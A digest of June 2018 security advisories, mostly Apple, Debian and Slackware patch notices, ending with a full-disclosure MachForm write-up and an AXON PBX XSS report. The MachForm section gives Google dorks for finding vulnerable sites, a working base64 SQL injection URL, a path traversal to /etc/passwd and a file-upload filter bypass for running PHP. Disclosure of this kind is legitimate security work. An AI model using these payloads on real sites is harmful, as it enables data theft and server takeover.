(@Sri_Hxor) of PrimeFort Pvt. Ltd CVE-2018-4250: Metehan Yılmaz of Sesim Sarpkaya Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to cause a denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-4247: François Renaud, Jesse Viviano of Verizon Enterprise Solutions Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to read a persistent account identifier Description: An authorization issue was addressed with improved state management. CVE-2018-4223: Abraham Masri (@cheesecakeufo) Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Users may be tracked by malicious websites using client certificates Description: An issue existed in the handling of S-MIME certificaties. This issue was addressed with improved
[SECURITY] [DSA 4191-2] redmine regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4191-2 secur...@debian.org https://www.debian.org/security/ Salvatore Bonaccorso June 03, 2018 https://www.debian.org/security/faq - - Package: redmine Debian Bug : 900283 The redmine security update announced as DSA-4191-1 caused regressions with multi-value fields while doing queries on project issues due to an bug in the patch to address CVE-2017-15569. Updated packages are now available to correct this issue. For the stable distribution (stretch), this problem has been fixed in version 3.3.1-4+deb9u2. We recommend that you upgrade your redmine packages. For the detailed security status of redmine please refer to its security tracker page at: https://security-tracker.debian.org/tracker/redmine Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlsTpTxfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0TXOg/9GNJ9+29acRbuozEZZyqzK56a5kCyKws69Td+TYNMMYWKgDtNARHVhs31 yH/eGID7Er3MfxkME85OQrfwCLYSaJOHBnOglIicf2dqUi6F2/pee/nfnAGad7th 7L58ohdGuOfH/vZn0BEXzsbpWiAiX03jxwZll1vbTVjNrjaejO/H8dbo10IiQ40B QJUeSPVzvOrZQ916H9p7gaQj8QUwc1UwT4ZgXTYICX1Md/rxn7WLCNV8tkxBYOqZ 8TCEIx1XQlGc4nkOe05vB09rLQGI9tPSk3o6gsJser15Kc3SqFZ4IfUvROBrwOOS cAKp8FoyVs4jsLsIedUA7GkN3jai+tvhahLWTH0ap8ayhnF5KIVQxllrE1g0UklH QNv7BytSRyb0hyvwkZpN9cXMC5H5tEbEKrCC36v8tbt4Nkf/Q72nHfowRuIOwTV7 TZrza15NEJLKtStLfzF5c2plWxs0ULBmDQ9cNiFHC+d54MqBr2PCYb3386dnwP3y 5Us+pBhDsHQ2/cWe2Vj0RsDt70k8TSWNBdxnsvoZZtYE3h0i2gAD00mR5wMJWa1y 3sG6I+D1cnBBPQW5GqrvFm9mx28PdgSGi8NipLJeeTOr3HXLlGOPIp9mWQAxqg// oNV5IZkJahG0KSXCPJ7l/k7yXw2hdVdLIns9DhaG4b/d1keTBSc= =6iKm -END PGP SIGNATURE-
APPLE-SA-2018-06-01-5 watchOS 4.3.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2018-06-01-5 watchOS 4.3.1 watchOS 4.3.1 addresses the following: Crash Reporter Available for: All Apple Watch models Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved error handling. CVE-2018-4206: Ian Beer of Google Project Zero FontParser Available for: All Apple Watch models Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2018-4211: Proteas of Qihoo 360 Nirvan Team Kernel Available for: All Apple Watch models Impact: An application may be able to execute arbitrary code with kernel privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2018-4241: Ian Beer of Google Project Zero CVE-2018-4243: Ian Beer of Google Project Zero Kernel Available for: All Apple Watch models Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved validation. CVE-2018-4249: Kevin Backhouse of Semmle Ltd. libxpc Available for: All Apple Watch models Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved validation. CVE-2018-4237: Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative Messages Available for: All Apple Watch models Impact: A local user may be able to conduct impersonation attacks Description: An injection issue was addressed with improved input validation. CVE-2018-4235: Anurodh Pokharel of Salesforce.com Messages Available for: All Apple Watch models Impact: Processing a maliciously crafted message may lead to a denial of service Description: This issue was addressed with improved message validation. CVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd Security Available for: All Apple Watch models Impact: A local user may be able to read a persistent device identifier Description: An authorization issue was addressed with improved state management. CVE-2018-4224: Abraham Masri (@cheesecakeufo) Security Available for: All Apple Watch models Impact: A local user may be able to modify the state of the Keychain Description: An authorization issue was addressed with improved state management. CVE-2018-4225: Abraham Masri (@cheesecakeufo) Security Available for: All Apple Watch models Impact: A local user may be able to read a persistent account identifier Description: An authorization issue was addressed with improved state management. CVE-2018-4223: Abraham Masri (@cheesecakeufo) Security Available for: All Apple Watch models Impact: A local user may be able to view sensitive user information Description: An authorization issue was addressed with improved state management. CVE-2018-4226: Abraham Masri (@cheesecakeufo) UIKit Available for: All Apple Watch models Impact: Processing a maliciously crafted text file may lead to a denial of service Description: A validation issue existed in the handling of text. This issue was addressed with improved validation of text. CVE-2018-4198: Hunter Byrnes WebKit Available for: All Apple Watch models Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A race condition was addressed with improved locking. CVE-2018-4192: Markus Gaasedelen, Nick Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro's Zero Day Initiative WebKit Available for: All Apple Watch models Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4214: found by OSS-Fuzz WebKit Available for: All Apple Watch models Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4246: found by OSS-Fuzz WebKit Available for: All Apple Watch models Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4201: an anonymous researcher CVE-2018-4218: Natalie Silvanovich of Google Project Zero CVE-2018-4233: Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative WebKit Available for: All Apple Watch models Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2018-4222: Natalie Silvanovich of Google Project Zero Installation note: Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General >
[slackware-security] git (SSA:2018-152-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] git (SSA:2018-152-01) New git packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix security issues. Here are the details from the Slackware 14.2 ChangeLog: +--+ patches/packages/git-2.14.4-i586-1_slack14.2.txz: Upgraded. This update fixes security issues: Submodule "names" come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting "../" into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235). Credit for finding this vulnerability and the proof of concept from which the test script was adapted goes to Etienne Stalmans. It was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233). Credit for fixing for these bugs goes to Jeff King, Johannes Schindelin and others. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11233 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/git-2.14.4-i486-1_slack13.0.txz Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/git-2.14.4-x86_64-1_slack13.0.txz Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/git-2.14.4-i486-1_slack13.1.txz Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/git-2.14.4-x86_64-1_slack13.1.txz Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/git-2.14.4-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/git-2.14.4-x86_64-1_slack13.37.txz Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/git-2.14.4-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/git-2.14.4-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/git-2.14.4-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/git-2.14.4-x86_64-1_slack14.1.txz Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/git-2.14.4-i586-1_slack14.2.txz Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/git-2.14.4-x86_64-1_slack14.2.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-2.17.1-i586-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/git-2.17.1-x86_64-1.txz MD5 signatures: +-+ Slackware 13.0 package: c2ad84d5f0e51131c349320231c08675 git-2.14.4-i486-1_slack13.0.txz Slackware x86_64 13.0 package: 7ae974e6cbf9e9952c3b23704932a20e git-2.14.4-x86_64-1_slack13.0.txz Slackware 13.1 package: c67fd56d50a633af8a73d1e798d53130 git-2.14.4-i486-1_slack13.1.txz Slackware x86_64 13.1 package: 76a36b0566a6740ccb1f84471ec5982d git-2.14.4-x86_64-1_slack13.1.txz Slackware 13.37 package: 959c467327d3e13c3f695f44bd23966a git-2.14.4-i486-1_slack13.37.txz Slackware x86_64 13.37 package: a7ae74f2bf301ae0692277150cb9f62d git-2.14.4-x86_64-1_slack13.37.txz Slackware 14.0 package: f649ba29533e529695629f3ced5cfb60 git-2.14.4-i486-1_slack14.0.txz Slackware x86_64 14.0 package: 72a672d0b644c292a0e0347587ddd410 git-2.14.4-x86_64-1_slack14.0.txz Slackware 14.1 package: 95b25602b3eddcf093afa3856a5b63c9 git-2.14.4-i486-1_slack14.1.txz Slackware x86_64 14.1 package: f8005eaedd8defc142a18a0fb19b3f68 git-2.14.4-x86_64-1_slack14.1.txz Slackware 14.2 package: fa6d08ddf2f760f314206a04faeeb02e git-2.14.4-i586-1_slack14.2.txz Slackware x86_64 14.2 package: 37e04e3f2fb8a348ef7a79e4174aa18b git-2.14.4-x86_64-1_slack14.2.txz Slackware -current package: a4d94a8d81e823f4cd745f6760700cc1 d/git-2.17.1-i586-1.txz Slackware x86_64 -current package: a87963571a912a32e120a396d09bd1eb d/git-2.17.1-x86_64-1.txz Installation
[SECURITY] [DSA 4217-1] wireshark security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-4217-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff June 03, 2018 https://www.debian.org/security/faq - - Package: wireshark CVE ID : CVE-2018-9273 CVE-2018-7320 CVE-2018-7334 CVE-2018-7335 CVE-2018-7419 CVE-2018-9261 CVE-2018-9264 CVE-2018-11358 CVE-2018-11360 CVE-2018-11362 It was discovered that Wireshark, a network protocol analyzer, contained several vulnerabilities in the dissectors for PCP, ADB, NBAP, UMTS MAC, IEEE 802.11, SIGCOMP, LDSS, GSM A DTAP and Q.931, which result in denial of service or the execution of arbitrary code. For the oldstable distribution (jessie), these problems have been fixed in version 1.12.1+g01b65bf-4+deb8u14. For the stable distribution (stretch), these problems have been fixed in version 2.2.6+g32dac6a-2+deb9u3. We recommend that you upgrade your wireshark packages. For the detailed security status of wireshark please refer to its security tracker page at: https://security-tracker.debian.org/tracker/wireshark Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlsUJDYACgkQEMKTtsN8 TjZZuhAAgp4EC8NWDWM50gZS42nQ/zghMyZe4sHca/KsNjPYwDydrwzzLliyWWwR 9UPuknvEZ5XxfOb1lctckQVqgyrOg2p0L8WKF4E/BqHPHjUVCW3MM2PzPtLHKoM9 +ZIDv9OQHl7gUmzjDd/FaD7/sECJFRIS8BOgRBUO98UkkaxrVLBcJq4f36dhQzhO V+xBidL4AZouez1WUzM2A2wfPONYavY4ivcwX0zwZ20XTpWdv0ik7VBPF5gWwK+f RZaaseOzOj68BVViLL6uM1aL+b8EvFp0iDxXq1Qi0A4H21C3/sOYNJlG50/iZX0G 8S7C3ivp3GdOVure0QufmeYA+tPv4usPz0h0NwQuSOyx0ug07J1ocsCJtCCuVMF/ qZH6DBX9QoaMELzr5yeq6htiZ629EhhK46YvSq/06Mzdw5JKwP+qTR3A38FNsn0Q ka7RAX/JkdhYxPOqjUOFvhnoym1Y6D7WsjkQxvtehbYauwgXQs+7SBEmakmalqR1 T5moQvTsEoiOcdPyL/zog2ncB6W0680bZq7xWvTyvnY87EtQkJQP/TvkxGz/P+tv snIwuZWjBOAw7aQ3zyuM8CMiwWZlId/+hpDJlW3otIwRH9YDFr4B68v71MCnqQVJ ai4K07/7PYknt7H6coKunMZaveHuXe2+w1QIVbct3OZWWNs0G7U= =FNmT -END PGP SIGNATURE-
APPLE-SA-2018-06-01-1 macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2018-06-01-1 macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, and Security Update 2018-003 El Capitan are now available and address the following: Accessibility Framework Available for: macOS High Sierra 10.13.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An information disclosure issue existed in Accessibility Framework. This issue was addressed with improved memory management. CVE-2018-4196: G. Geshev working with Trend Micro's Zero Day Initiative, an anonymous researcher AMD Available for: macOS High Sierra 10.13.4 Impact: A local user may be able to read kernel memory Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation. CVE-2018-4253: shrek_wzw of Qihoo 360 Nirvan Team apache_mod_php Available for: macOS High Sierra 10.13.4 Impact: Issues in php were addressed in this update Description: This issue was addressed by updating to php version 7.1.16. CVE-2018-7584: Wei Lei and Liu Yang of Nanyang Technological University ATS Available for: macOS High Sierra 10.13.4 Impact: A malicious application may be able to elevate privileges Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4219: Mohamed Ghannam (@_simo36) Bluetooth Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6 Impact: A malicious application may be able to determine kernel memory layout. Description: An information disclosure issue existed in device properties. This issue was addressed with improved object management. CVE-2018-4171: shrek_wzw of Qihoo 360 Nirvan Team Firmware Available for: macOS High Sierra 10.13.4 Impact: A malicious application with root privileges may be able to modify the EFI flash memory region Description: A device configuration issue was addressed with an updated configuration. CVE-2018-4251: Maxim Goryachy and Mark Ermolov FontParser Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2018-4211: Proteas of Qihoo 360 Nirvan Team Grand Central Dispatch Available for: macOS High Sierra 10.13.4 Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An issue existed in parsing entitlement plists. This issue was addressed with improved input validation. CVE-2018-4229: Jakob Rieck (@0xdead10cc) of the Security in Distributed Systems Group, University of Hamburg Graphics Drivers Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4159: Axis and pjf of IceSword Lab of Qihoo 360 Hypervisor Available for: macOS High Sierra 10.13.4 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption vulnerability was addressed with improved locking. CVE-2018-4242: Zhuo Liang of Qihoo 360 Nirvan Team iBooks Available for: macOS High Sierra 10.13.4 Impact: An attacker in a privileged network position may be able to spoof password prompts in iBooks Description: An input validation issue was addressed with improved input validation. CVE-2018-4202: Jerry Decime Intel Graphics Driver Available for: macOS High Sierra 10.13.4 Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4141: an anonymous researcher, Zhao Qixun (@S0rryMybad) of Qihoo 360 Vulcan Team IOFireWireAVC Available for: macOS High Sierra 10.13.4 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2018-4228: Benjamin Gnahm (@mitp0sh) of Mentor Graphics IOGraphics Available for: macOS High Sierra 10.13.4 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4236: Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team IOHIDFamily Available for: macOS High Sierra 10.13.4 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4234: Proteas of Qihoo 360 Nirvan Team Kernel Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4 Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed
APPLE-SA-2018-06-01-2 Safari 11.1.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2018-06-01-2 Safari 11.1.1 Safari 11.1.1 is now available and addresses the following: Safari Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: A malicious website may be able to cause a denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-4247: François Renaud, Jesse Viviano of Verizon Enterprise Solutions Safari Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4205: xisigr of Tencent's Xuanwu Lab (tencent.com) WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Visiting a maliciously crafted website may lead to cookies being overwritten Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions. CVE-2018-4232: an anonymous researcher, Aymeric Chaib WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2018-4246: found by OSS-Fuzz WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A race condition was addressed with improved locking. CVE-2018-4192: Markus Gaasedelen, Nick Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro's Zero Day Initiative WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4214: found by OSS-Fuzz WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4201: an anonymous researcher CVE-2018-4218: Natalie Silvanovich of Google Project Zero CVE-2018-4233: Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2018-4199: Alex Plaskett, Georgi Geshev, Fabi Beterke, and Nils of MWR Labs working with Trend Micro's Zero Day Initiative WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Visiting a maliciously crafted website may leak sensitive data Description: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method. CVE-2018-4190: Jun Kokatsu (@shhnjk) WebKit Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2018-4222: Natalie Silvanovich of Google Project Zero Installation note: Safari 11.1.1 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEWpnGpHhyhjM9LuGIyxcaHpDFUHMFAlsRa04pHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQyxcaHpDFUHOVEQ/+ P+thAL+hl4RuHIXCrfh/eZ+GgwPXDDVSPRefnHckiEMZSXpSDiTTu1JwWkgHf44l xwOqvFd56zSVo/gk/45FnOcpoXxcFuHk2ddJvZM4R4EaCwKW3PEcTIL+8klxyDWo 17HqxtfB32Gy6BSARcfTkXZ1/c4CfhQefYiU2JtLDui6iZLUzDEGWdQRf/Q0H8tx DNBVy1i5HGZdrZ6sgR7eKZKyuscqj9n0IbBUybPOQ37OFRfl8CYPT+XB6djgWGxo sLkZi+XYl/O/PXzQt9XfxkgKUjvvlR2hkt2mKTjFEUQDQIha4BkE2+1EdJZPNROz LRbMnxiAvY/7vb5a98h8nmXe3Z/Os/BZYyipMQjbMQt5BNkRHQK03prn7kd/g1F1 eKeplTnob9CDMcEbdnn5KvkdYcoyJFqcignVvGFJQupAU8+HJgneH4ky5laGkHY5
MachForm Multiple Vulnerabilities CVE-2018-6409/CVE-2018-6410/CVE-2018-6411
Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/
Author: Amine Taouirsa
Twitter: @metalamin
Google dork examples:
--
"machform" inurl:"view.php"
"machform" inurl:"embed.php"
Summary:
-
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.
The application is widely deployed and with some google dorks it’s
possible to find various webpages storing sensitive data as credit
card numbers with corresponding security codes. Also, the arbitrary
file upload can let an attacker get control of the server by uploading
a WebShell.
[1] SQL injection (CVE-2018-6410):
-
[1.1] Description:
The software is subject to SQL injections in the ‘download.php’ file.
[1.2] Parameters and statement:
This SQLi can be found on the parameter ‘q’ which a base64 encoded
value for the following parameters:
$form_id = $params['form_id'];
$id = $params['id'];
$field_name = $params['el'];
$file_hash = $params['hash'];
So the injectable parameters are ‘el’ and ‘form_id’ obtaining
error-based, stacked queries and time-based blind SQL injections. This
is due to the following vulnerable statement:
$query = "select {$field_name} from
`".MF_TABLE_PREFIX."form_{$form_id}` where id=?";
[1.3] POC
Proof of concept to get the first user mail:
http:// [URL] / [Machform_folder]
/download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
Which is the base64 encoding for:
el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) ;=1=1_id=1
[2] Path traversal (CVE-2018-6409):
---
[2.1] Descrition
download.php’ is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form
table leads to a path traversal vulnerability.
[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set
element_4="../../../../../../../../../../../../../../../../etc/passwd"
where id=1;
Now in order to be able to download it, we need to access:
http:// [URL] / [Machform_folder]
/download.php?q=ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0NTgmZm9ybV9pZD01ODAwOQo=
Which is the base64 encoding for;
el=4=1=402ba0230d6f44a2de590ac11107a458_id=58009
Note that hash is the MD5 of the corresponding filename:
md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458
[3] Bypass file upload filter (CVE-2018-6411):
--
When the form is set to filter a blacklist, it automatically add
dangerous extensions to the filters.
If the filter is set to a whitelist, the dangerous extensions can be bypassed.
This can be done directly on the database via SQLi
update ap_form_elements set
element_file_type_list="php",element_file_block_or_allow="a" where
form_id=58009 and element_id=4;
Once uploaded the file can be found and executed in the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
The filename can be found in the database
SELECT element_4 FROM ap_form_58009 WHERE id=1;
CVE-2018-11552 AXON PBX 2.02 Cross Site Scripting Vulnerability
Aloha,
*1. Introduction*
Vendor:NCH Software
Affected Product: AXON PBX - 2.02
Vendor Website:http://www.nch.com.au/pbx/index.html
Vulnerability Type:Reflected XSS
Remote Exploitable:Yes
CVE: CVE-2018-11552
*2. Overview*
There is a reflected XSS vulnerability in AXON PBX Web interface. The
vulnerability exists due to insufficient filtration of user-supplied data.
A remote attacker can execute arbitrary HTML and script code in browser in
context of the vulnerable application.
*3. Affected Parameter*
'Name' Parameter (Go to AXON->Auto-Dialer->Agents->Name)
*4. Payload*
alert('XSS')
*5. Credit*
Himanshu Mehta (@LionHeartRoxx)
Chao,
Himanshu Mehta
